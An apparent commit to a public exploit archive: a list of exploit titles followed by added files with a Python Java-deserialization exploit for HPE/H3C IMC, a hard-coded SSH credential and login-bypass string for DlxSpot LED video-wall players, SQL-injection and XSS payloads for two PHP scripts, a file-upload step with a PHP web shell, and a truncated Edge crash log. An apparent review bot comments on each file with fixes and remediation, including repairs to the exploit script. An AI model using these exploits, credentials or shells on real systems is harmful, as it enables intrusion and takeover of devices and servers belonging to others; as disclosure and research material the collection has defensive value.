Maintain 3.0.0-RC2 - 'Example6.php' Remote File Inclusion
Zorum 3.5 - DBProperty.php Remote File Inclusion
Zorum 3.5 - 'DBProperty.php' Remote File Inclusion
PHPMyConferences 8.0.2 - Init.php Remote File Inclusion
PHPMyConferences 8.0.2 - 'Init.php' Remote File Inclusion
PHPTreeView 1.0 - TreeViewClass.php Remote File Inclusion
PHPTreeView 1.0 - 'TreeViewClass.php' Remote File Inclusion
PLS-Bannieres 1.21 - Bannieres.php Remote File Inclusion
PLS-Bannieres 1.21 - 'Bannieres.php' Remote File Inclusion
The Search Engine Project 0.942 - Configfunction.php Remote File Inclusion
The Search Engine Project 0.942 - 'Configfunction.php' Remote File Inclusion
KnowledgeBuilder 2.2 - visEdit_Control.Class.php Remote File Inclusion
KnowledgeBuilder 2.2 - 'visEdit_Control.Class.php' Remote File Inclusion
NewP News Publishing System 1.0 - Class.Database.php Remote File Inclusion
NewP News Publishing System 1.0 - 'Class.Database.php' Remote File Inclusion
Advanced Guestbook 2.3.1 - admin.php Remote File Inclusion
Advanced Guestbook 2.3.1 - 'admin.php' Remote File Inclusion
@cid Stats 2.3 - Install.php3 Remote File Inclusion
@cid Stats 2.3 - 'Install.php3' Remote File Inclusion
PHPMyChat 0.14/0.15 - Languages.Lib.php Local File Inclusion
PHPMyChat 0.14/0.15 - 'Languages.Lib.php' Local File Inclusion
PHPdebug 1.1 - Debug_test.php Remote File Inclusion
PHPdebug 1.1 - 'Debug_test.php' Remote File Inclusion
eXtreme-fusion 4.02 - Fusion_Forum_View.php Local File Inclusion
eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion
Easy Banner Pro 2.8 - info.php Remote File Inclusion
Edit-X - Edit_Address.php Remote File Inclusion
Easy Banner Pro 2.8 - 'info.php' Remote File Inclusion
Edit-X - 'Edit_Address.php' Remote File Inclusion
OpenEMR 2.8.2 - Import_XML.php Remote File Inclusion
OpenEMR 2.8.2 - 'Import_XML.php' Remote File Inclusion
PHPProbid 5.24 - Lang.php Remote File Inclusion
PHPProbid 5.24 - 'Lang.php' Remote File Inclusion
MySQLNewsEngine - Affichearticles.php3 Remote File Inclusion
MySQLNewsEngine - 'Affichearticles.php3' Remote File Inclusion
Meganoide's News 1.1.1 - Include.php Remote File Inclusion
Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion
Shop Kit Plus - StyleCSS.php Local File Inclusion
Shop Kit Plus - 'StyleCSS.php' Local File Inclusion
Pickle 0.3 - download.php Local File Inclusion
Active Calendar 1.2 - showcode.php Local File Inclusion
Pickle 0.3 - 'download.php' Local File Inclusion
Active Calendar 1.2 - 'showcode.php' Local File Inclusion
JCCorp URLShrink Free 1.3.1 - CreateURL.php Remote File Inclusion
JCCorp URLShrink Free 1.3.1 - 'CreateURL.php' Remote File Inclusion
Weekly Drawing Contest 0.0.1 - Check_Vote.php Local File Inclusion
Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion
WordPress < 2.1.2 - PHP_Self Cross-Site Scripting
WordPress < 2.1.2 - 'PHP_Self' Cross-Site Scripting
Satel Lite - Satellite.php Local File Inclusion
Satel Lite - 'Satellite.php' Local File Inclusion
eCardMAX HotEditor 4.0 - Keyboard.php Local File Inclusion
eCardMAX HotEditor 4.0 - 'Keyboard.php' Local File Inclusion
MyNews 4.2.2 - Week_Events.php Remote File Inclusion
MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion
Web Service Deluxe News Manager 1.0.1 Deluxe - footer.php Local File Inclusion
Actionpoll 1.1 - Actionpoll.php Remote File Inclusion
Web Service Deluxe News Manager 1.0.1 Deluxe - 'footer.php' Local File Inclusion
Actionpoll 1.1 - 'Actionpoll.php' Remote File Inclusion
Fully Modded PHPBB2 - phpbb_root_path Remote File Inclusion
Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion
PHP Turbulence 0.0.1 - Turbulence.php Remote File Inclusion
PHP Turbulence 0.0.1 - 'Turbulence.php' Remote File Inclusion
Allfaclassifieds 6.04 - Level2.php Remote File Inclusion
PHPMyBibli 1.32 - Init.Inc.php Remote File Inclusion
Allfaclassifieds 6.04 - 'Level2.php' Remote File Inclusion
PHPMyBibli 1.32 - 'Init.Inc.php' Remote File Inclusion
ACVSWS - Transport.php Remote File Inclusion
ACVSWS - 'Transport.php' Remote File Inclusion
Lms 1.5.x - RTMessageAdd.php Remote File Inclusion
Lms 1.5.x - 'RTMessageAdd.php' Remote File Inclusion
MyNewsGroups 0.6 - Include.php Remote File Inclusion
PHPMyTGP 1.4 - AddVIP.php Remote File Inclusion
MyNewsGroups 0.6 - 'Include.php' Remote File Inclusion
PHPMyTGP 1.4 - 'AddVIP.php' Remote File Inclusion
Comus 2.0 - Accept.php Remote File Inclusion
Comus 2.0 - 'Accept.php' Remote File Inclusion
HTMLEditBox 2.2 - config.php Remote File Inclusion
DynaTracker 1.5.1 - includes_handler.php base_path Remote File Inclusion
DynaTracker 1.5.1 - action.php base_path Remote File Inclusion
HTMLEditBox 2.2 - 'config.php' Remote File Inclusion
DynaTracker 1.5.1 - 'includes_handler.php' 'base_path' Remote File Inclusion
DynaTracker 1.5.1 - 'action.php' 'base_path' Remote File Inclusion
Doruk100Net - Info.php Remote File Inclusion
Doruk100Net - 'Info.php' Remote File Inclusion
PHPSecurityAdmin 4.0.2 - Logout.php Remote File Inclusion
PHPSecurityAdmin 4.0.2 - 'Logout.php' Remote File Inclusion
PHP Content Architect 0.9 pre 1.2 - MFA_Theme.php Remote File Inclusion
PHP Content Architect 0.9 pre 1.2 - 'MFA_Theme.php' Remote File Inclusion
PHPHostBot 1.05 - Authorize.php Remote File Inclusion
PHPHostBot 1.05 - 'Authorize.php' Remote File Inclusion
PHMe 0.0.2 - Function_List.php Local File Inclusion
PHMe 0.0.2 - 'Function_List.php' Local File Inclusion
VietPHP - _functions.php dirpath Parameter Remote File Inclusion
VietPHP - admin/index.php language Parameter Remote File Inclusion
VietPHP - '_functions.php' dirpath Parameter Remote File Inclusion
VietPHP - 'admin/index.php' language Parameter Remote File Inclusion
Coppermine Photo Gallery 1.3/1.4 - YABBSE.INC.php Remote File Inclusion
Coppermine Photo Gallery 1.3/1.4 - 'YABBSE.INC.php' Remote File Inclusion
Shoutbox 1.0 - Shoutbox.php Remote File Inclusion
Shoutbox 1.0 - 'Shoutbox.php' Remote File Inclusion
Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion
Web News 1.1 - news.php config[root_ordner] Parameter Remote File Inclusion
Lib2 PHP Library 0.2 - My_Statistics.php Remote File Inclusion
Web News 1.1 - 'feed.php' 'config[root_ordner]' Parameter Remote File Inclusion
Web News 1.1 - 'news.php' 'config[root_ordner]' Parameter Remote File Inclusion
Lib2 PHP Library 0.2 - 'My_Statistics.php' Remote File Inclusion
Dalai Forum 1.1 - forumreply.php Local File Inclusion
Firesoft - Class_TPL.php Remote File Inclusion
Dalai Forum 1.1 - 'forumreply.php' Local File Inclusion
Firesoft - 'Class_TPL.php' Remote File Inclusion
PHP-Nuke 8.0 - autohtml.php Local File Inclusion
PHP-Nuke 8.0 - 'autohtml.php' Local File Inclusion
Content Builder 0.7.5 - postComment.php Remote File Inclusion
Content Builder 0.7.5 - 'postComment.php' Remote File Inclusion
Jeebles Technology Jeebles Directory 2.9.60 - download.php Local File Inclusion
Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion
PHPbasic basicFramework 1.0 - Includes.php Remote File Inclusion
PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion
Galmeta Post 0.2 - Upload_Config.php Remote File Inclusion
Galmeta Post 0.2 - 'Upload_Config.php' Remote File Inclusion
MyBlog 1.x - Games.php ID Remote File Inclusion
MyBlog 1.x - 'Games.php' 'ID' Remote File Inclusion
PHPMyTourney 2 - tourney/index.php Remote File Inclusion
PHPMyTourney 2 - 'tourney/index.php' Remote File Inclusion
W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - create_forum.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - create_user.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - delete_notes.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - delete_user.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - edit_forum.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - mail_users.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - moderate_notes.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - reorder_forums.php bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'add_user.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'create_forum.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'create_user.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'delete_notes.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'delete_user.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'edit_forum.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'mail_users.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'moderate_notes.php' bn_dir_default Parameter Remote File Inclusion
W-Agora 4.0 - 'reorder_forums.php' bn_dir_default Parameter Remote File Inclusion
XOOPS 2.0.18 - modules/system/admin.php fct Parameter Traversal Local File Inclusion
XOOPS 2.0.18 - 'modules/system/admin.php' 'fct' Parameter Traversal Local File Inclusion
Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Webshell
Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Web Shell
C99Shell 1.0 Pre-Release build 16 - 'ch99.php' Cross-Site Scripting
C99Shell 1.0 Pre-Release build 16 (Web Shell) - 'ch99.php' Cross-Site Scripting
C99 Shell - 'c99.php' Authentication Bypass
C99Shell (Web Shell) - 'c99.php' Authentication Bypass
W-Agora 4.2.1 - search.php3 bn Parameter Traversal Local File Inclusion
W-Agora 4.2.1 - 'search.php3' 'bn' Parameter Traversal Local File Inclusion
Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' Remote PHP Code Execution
Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' PHP Remote Code Execution
MySQLDumper 1.24.4 - 'menu.php' Remote PHP Code Execution
MySQLDumper 1.24.4 - 'menu.php' PHP Remote Code Execution
Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution
Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution
Zend Framework 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM
Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection
Nuts CMS - Remote PHP Code Injection / Execution
Nuts CMS - PHP Remote Code Injection / Execution
WordPress Plugin WP Super Cache - Remote PHP Code Execution
WordPress Plugin WP Super Cache - PHP Remote Code Execution
b374k Web Shell 3.2.3/2.8 - Cross-Site Request Forgery / Command Injection
b374k 3.2.3/2.8 (Web Shell) - Cross-Site Request Forgery / Command Injection
Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] Remote File Inclusion
Ovidentia online Module 2.8 - 'GLOBALS[babAddonPhpPath]' Remote File Inclusion
XOOPS Glossaire Module- '/modules/glossaire/glossaire-aff.php' SQL Injection
XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection
ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials
Remote SYSTEM Code Execution ZKTeco ZKBioSecurity 3.0 - Hard-Coded Credentials SYSTEM Remote Code Execution Apache - HTTP OPTIONS Memory Leak Apache < 2.2.34 / < 2.4.27 - HTTP OPTIONS Memory Leak Foodspotting Clone 1.0 - SQL Injection iTech Gigs Script 1.20 - 'cat' Parameter SQL Injection Tecnovision DLX Spot - Authentication Bypass Tecnovision DLX Spot - Arbitrary File Upload
parent ef4c288da7
commit 13a6e2baaf
9 changed files with 981 additions and 323 deletions
platforms/java/remote/42756.py (Executable file, 104 lines added)
@ -0,0 +1,104 @@
#!/usr/bin/env python

########################################################################################################
#
# HPE/H3C IMC - Java Deserialization Exploit
#
# Version 0.1
# Tested on Windows Server 2008 R2
# Name HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91
#
# Author:
# Raphael Kuhn (Daimler TSS)
#
# Special thanks to:
# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon
#
#######################################################################################################

import requests
import sys
import os
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

host = "127.0.0.1:8080"
payload_file = "payload.bin"
body = ""

def printUsage () :
print "......................................................................................................................"
print "."
print ". HPE/H3C - IMC Java Deserialization Exploit"
print "."
print ". Example 1: -payload-binary"
print ". [-] Usage: %s http[s]://<IP>:<PORT> -payload-binary payload" % sys.argv[0]
print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
print ". 1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) "
print ". java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin"
print ". 2. Send request to server"
print ". %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
print "."
print ". Example 2: -payload-string"
print '. [-] Usage: %s http[s]://<IP>:<PORT> -payload-string "payload"' % sys.argv[0]
print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
print ". 1. Send request to server with payload as string (need ysoserial.jar in the same folder)"
print '. %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
print "."
print "......................................................................................................................"

def loadPayloadFile (_fileName) :
print "[+] Load payload file %s" % _fileName
payloadFile = open(_fileName, 'rb')
payloadFile_read = payloadFile.read()
return payloadFile_read

def exploit (_payload) :
url = sys.argv[1]
url += "/imc/topo/WebDMServlet"
print "[+] Sending exploit to %s" % (url)
data = _payload
response = requests.post(url, data=data, verify=False)
return response

#def showResponse(_response):
# r = response
# m = r.search(_response)
# if (m.find("java.lang.NullPointerException")):
# print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)"
# else:
# print "[-] ClassCastException not found, exploit failed"


if __name__ == "__main__":
if len(sys.argv) < 4:
printUsage()
sys.exit(0)
else:
print "------------------------------------------"
print "- HPE/H3C - IMC Java Deserialization Exploit -"
print "------------------------------------------"
host = sys.argv[1]
print "[*] Connecting to %s" %host
if sys.argv[2] == "-payload-binary":
payload_file = sys.argv[3]
if os.path.isfile(payload_file):
payload = loadPayloadFile(payload_file)
response = exploit(payload)
showResponse(response.content)
else:
print "[-] Can't load payload file"
elif sys.argv[2] == "-payload-string":
if os.path.isfile("ysoserial.jar"):
sPayload = sys.argv[3]
sPayload = "java -jar ysoserial.jar CommonsCollections5 '" +sPayload+ "' > payload.bin"
print "[+] Create payload file (%s) " %sPayload
os.system(sPayload)
payload = loadPayloadFile(payload_file)
response = exploit(payload)
print "[+] Response received, exploit finished."
else:
print "[-] Can't load ysoserial.jar"
else:
printUsage()
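Review bot: the `-payload-binary` branch calls `showResponse(response.content)`, but `showResponse` only exists inside the commented-out block above `if __name__`, so that path raises NameError immediately after the POST to `/imc/topo/WebDMServlet` has gone out; the commented body would not work either (`r = response` ignores `_response`, and `r.search` is not a string method), so either drop the call or replace it with the `"[+] Response received, exploit finished."` line the `-payload-string` branch already prints. In the `-payload-string` branch, `sys.argv[3]` is spliced unquoted into a shell string for `os.system`, so a value containing a single quote breaks the command; build the ysoserial invocation as an argument list with `subprocess` and redirect its stdout to `payload_file`. Smaller points: `host` and `body` are assigned but never used (`exploit()` re-reads `sys.argv[1]`), the usage text names CommonsCollections3 while the string path hard-codes CommonsCollections5, and `printUsage()` followed by `sys.exit(0)` reports success on a usage error. For defenders, the one observable this file fixes is an unauthenticated POST to `/imc/topo/WebDMServlet` carrying a serialized Java object as the raw body.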
platforms/multiple/remote/42753.txt (Executable file, 34 lines added)
@ -0,0 +1,34 @@
# Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH Password.
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: All known versions
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls all over the world, they are used in football arenas, concert halls, shopping malls, as roadsigns etc.
# CVE: CVE-2017-12928
# Linked CVE's: CVE-2017-12929, CVE-2017-12930

# Visit my github page at https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md for complete takeover of the box, from SQLi to root access.
###############################################################################################################################

Hardcoded password for all dlxspot players, login with the following credentials via SSH

username: dlxuser
password: tecn0visi0n

Escalate to root with the same password.

TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage.
2017-06-01 - No response, tried contacting again through several contact forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company.
2017-09-18 - No response, full public disclosure.

DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
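Review bot: the title says "Hardcoded Root SSH Password" but the credentials given are for `dlxuser`, with root reached only by "Escalate to root with the same password"; the file should say which mechanism that is (su with a shared root password, or sudo rights for dlxuser), because the two imply different fixes and different log lines to look for. "Version: All known versions" also disagrees with "Version: >1.5.10" in the two sibling advisories for the same product in this commit (42754.txt, 42755.txt), which share the same timeline. No remediation is stated at all; for a hard-coded SSH credential on a fleet device the advisory can still say the minimum an operator can do without a vendor fix, namely restrict SSH to a management network and audit logins for `dlxuser`.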
platforms/php/webapps/42751.txt (Executable file, 44 lines added)
@ -0,0 +1,44 @@
# Exploit Title: Foodspotting Clone v1.0 - SQL Injection/Reflected XSS
# Date: 2017-09-13
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.phpscriptsmall.com/product/foodspotting-clone/
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-09-13

Product & Service Introduction:
===============================
Foodspotting Clone allows you to initiate your very own social networking website that similar appearance as Foodspotting and additional food lover websites.

Technical Details & Description:
================================

Reflected XSS/SQL injection on [resid] parameter.

Proof of Concept (PoC):
=======================

SQLi:

http://localhost/[path]/restaurant-menu.php?resid=' AND SLEEP(5) AND 'nhSH'='nhSH

Parameter: resid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: resid=' AND SLEEP(5) AND 'nhSH'='nhSH

Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: resid=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x435a72445467737074496d6e5a7855726f6e534c4b6469705774427550576c70676d425361626642,0x71767a6271),NULL,NULL,NULL-- aIwp

Reflected XSS:

http://localhost/[path]/restaurant-menu.php?resid=/"><svg/onload=alert(/8bitsec/)>
==================
8bitsec - [https://twitter.com/_8bitsec]
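Review bot: both findings are on the same `resid` parameter of `restaurant-menu.php`, so the write-up should say that one change covers both (a parameterised query for `resid` plus output encoding where the value is echoed back into the page); as it stands there is no remediation line. The SQLi section is pasted sqlmap output: the `CONCAT(0x7176627a71, ..., 0x71767a6271)` hex strings are sqlmap's random boundary markers, `-- aIwp` is its random comment suffix and `'nhSH'='nhSH` its tautology, none of which is product-specific, and saying so would stop readers treating them as part of the bug. The `SLEEP(5)` probe and the 14-column `UNION ALL SELECT NULL,...` are also the two patterns a query log or WAF review would match on for this parameter.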
platforms/php/webapps/42752.txt (Executable file, 37 lines added)
@ -0,0 +1,37 @@
# Exploit Title: iTech Gigs Script v1.20 - SQL Injection
# Date: 2017-09-15
# Exploit Author: 8bitsec
# Vendor Homepage: http://itechscripts.com/
# Software Link: http://itechscripts.com/the-gigs-script/
# Version: 1.20
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-09-15

Product & Service Introduction:
===============================
Designed to launch an online market place facilitating participation of professionals from diverse walks of life.

Technical Details & Description:
================================

SQL injection on [cat] parameter.

Proof of Concept (PoC):
=======================

SQLi:

http://localhost/[path]/browse-category.php?cat=xxxxx' AND 4079=4079 AND 'zpSy'='zpSy

Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=10c4ca4238a0b923820dcc509a6f75849b' AND 4079=4079 AND 'zpSy'='zpSy

==================
8bitsec - [https://twitter.com/_8bitsec]
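Review bot: the PoC URL uses `cat=xxxxx'` while the sqlmap Payload line uses `cat=10c4ca4238a0b923820dcc509a6f75849b'`, so the two lines do not describe the same request; the Payload line shows the application's real `cat` value is a hash-like id and the PoC should use the same one, since a boolean-blind check on a category that does not exist will not show the true/false difference the finding relies on. `4079=4079` is a tautology only, so the file demonstrates that `cat` reaches the `WHERE`/`HAVING` clause unescaped but shows no data extraction, and the Technical Details line should say exactly that rather than just "SQL injection on [cat] parameter". No remediation is given; a prepared statement for `cat` in `browse-category.php` is the fix.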
platforms/php/webapps/42754.txt (Executable file, 43 lines added)
@ -0,0 +1,43 @@
# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL
Injection
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls
all over the world, they are used in football arenas, concert halls,
shopping malls, as roadsigns etc.
# CVE: CVE-2017-12930
# Linked CVE's: CVE-2017-12928, CVE-2017-12929

# Visit my github page at
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
for complete takeover of the box, from SQLi to full root access.
###############################################################################################################################

DlxSpot Player 4 above version 1.5.10 suffers from an SQL injection
vulnerability in the admin interface login and is exploitable the following
way:

username:admin
password:x' or 'x'='x

TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer
homepage.
2017-06-01 - No response, tried contacting again through several contact
forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
email in Italian to the company.
2017-09-18 - No response, full public disclosure.

DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
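Review bot: the header block is hard-wrapped (`# Exploit Title: ... Admin Interface SQL` / `Injection`, `# About:` over three lines, `# Visit my github page at` over three), so the continuation lines lack the `#` prefix and the metadata no longer has one field per line as in the sibling 42753.txt; unwrap them before merging. "Version: >1.5.10" conflicts with "All known versions" in 42753.txt for the same product and the same timeline. The PoC `x' or 'x'='x` in the password field shows the raw password is concatenated into the login query, which suggests the stored password is compared inside SQL rather than hashed and compared in application code; the remediation that follows (parameterised login query, and hashing the password before any comparison) is absent and should be stated.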
platforms/php/webapps/42755.txt (Executable file, 43 lines added)
@ -0,0 +1,43 @@
# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload
to RCE
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls
all over the world, they are used in football arenas, concert halls,
shopping malls, as roadsigns etc.
# CVE: CVE-2017-12929
# Linked CVE's: CVE-2017-12928, CVE-2017-12930.

# Visit my github page at
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
for complete takeover of the box, from SQLi to root access.
###############################################################################################################################

Arbitrary File Upload leading to Remote Command Execution:

1. Visit http://host/resource.php and upload PHP shell. For example: <?php
system($_GET["c"]); ?>
2. RCE via http://host/resource/source/shell.php?c=id
3. Output: www-data

TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer
homepage.
2017-06-01 - No response, tried contacting again through several contact
forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
email in Italian to the company.
2017-09-18 - No response, full public disclosure.

DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN
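Review bot: same hard-wrapping problem as 42754.txt (title split across `... Arbitrary File Upload` / `to RCE`, and step 1's one-line PHP sample split over two lines), so unwrap before merging. Steps 1 to 3 already contain the facts a remediation needs: the upload lands under the webroot at `/resource/source/` with its original filename, PHP is executed from that directory, and the process runs as `www-data`; the fix that follows (store uploads outside the webroot or deny script execution in that directory, rename on upload, whitelist extension and content type, and check whether `resource.php` requires authentication at all, which the text does not say) should be stated rather than left to the reader. Minor: the `# Linked CVE's:` line ends with a stray period unlike the sibling files.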
platforms/windows/dos/42758.txt (Executable file, 115 lines added)
@ -0,0 +1,115 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1309

There is a security issue in Microsoft Edge related to how HTML documents are loaded. If Edge displays a HTML document from a slow HTTP server, it is possible that a part of the document is going to be rendered before the server has finished sending the document. It is also possible that some JavaScript code is going to trigger.

By making DOM modifications before the document had a chance of fully loading, followed by another set of DOM modifications afer the page has been loaded, it is possible to trigger memory corruption that could possibly lead to an exploitable condition.

A debug log is included below. Note that the crash RIP directly preceeds a (CFG-protected) indirect call, which demonstrates the exploitability of the issue.

Since a custom HTTP server is needed to demonstrate the issue, I'm attaching all of the required code. Simply run server.py and point Edge to http://127.0.0.1:8000/

Note: this has been tested on Microsoft Edge 38.14393.1066.0 (Microsoft EdgeHTML 14.14393)


Debug log:

=========================================

(a68.9c0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] ds:00000000`abcdbbbb=????????????????

0:013> k
# Child-SP RetAddr Call Site
00 000000eb`c42f8da0 00007ffa`9d8b243d edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa
01 000000eb`c42f8dd0 00007ffa`9d8b28e2 edgehtml!Collections::SGrowingArray<TSmartPointer<Tree::ANode,CStrongReferenceTraits> >::DeleteAt+0x89
02 000000eb`c42f8e00 00007ffa`9d8b0cd7 edgehtml!Undo::UndoNodeList::RemoveNodesCompletelyContained+0x5e
03 000000eb`c42f8e30 00007ffa`9d8ad79b edgehtml!Undo::WrapUnwrapNodeUndoUnit::RemoveNodesAtOldPosition+0x33
04 000000eb`c42f8e70 00007ffa`9d5b303d edgehtml!Undo::MoveForestUndoUnit::HandleWrapUnwrap+0x6b
05 000000eb`c42f8f10 00007ffa`9d8ac629 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa3fd
06 000000eb`c42f8f60 00007ffa`9d5b3085 edgehtml!Undo::ParentUndoUnit::ApplyScriptedOperationToChildren+0xb5
07 000000eb`c42f8ff0 00007ffa`9d11035c edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa445
08 000000eb`c42f9040 00007ffa`9d110125 edgehtml!Undo::UndoManager::ApplyScriptedOperationsToUserUnits+0x11c
09 000000eb`c42f9130 00007ffa`9d1d6f0d edgehtml!Undo::UndoManager::SubmitUndoUnit+0x125
0a 000000eb`c42f9170 00007ffa`9dc9c9ae edgehtml!CSelectionManager::CreateAndSubmitSelectionUndoUnit+0x141
0b 000000eb`c42f9200 00007ffa`9dc90b70 edgehtml!CRemoveFormatBaseCommand::PrivateExec+0xae
0c 000000eb`c42f92c0 00007ffa`9dc9057a edgehtml!CCommand::Exec+0xe8
0d 000000eb`c42f9350 00007ffa`9d55e481 edgehtml!CMshtmlEd::Exec+0x17a
0e 000000eb`c42f93b0 00007ffa`9d39cc34 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xa5841
0f 000000eb`c42f9470 00007ffa`9d21d6a1 edgehtml!CDoc::ExecHelper+0x5d18
10 000000eb`c42fb020 00007ffa`9d1dbb57 edgehtml!CDocument::Exec+0x41
11 000000eb`c42fb070 00007ffa`9d1dba25 edgehtml!CBase::execCommand+0xc7
12 000000eb`c42fb0f0 00007ffa`9d1db8ac edgehtml!CDocument::execCommand+0x105
13 000000eb`c42fb2e0 00007ffa`9d498155 edgehtml!CFastDOM::CDocument::Trampoline_execCommand+0x124
14 000000eb`c42fb3f0 00007ffa`9c930e37 edgehtml!CFastDOM::CDocument::Profiler_execCommand+0x25
15 000000eb`c42fb420 00007ffa`9c9e9073 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x177
16 000000eb`c42fb500 00007ffa`9c9596cd chakra!amd64_CallFunction+0x93
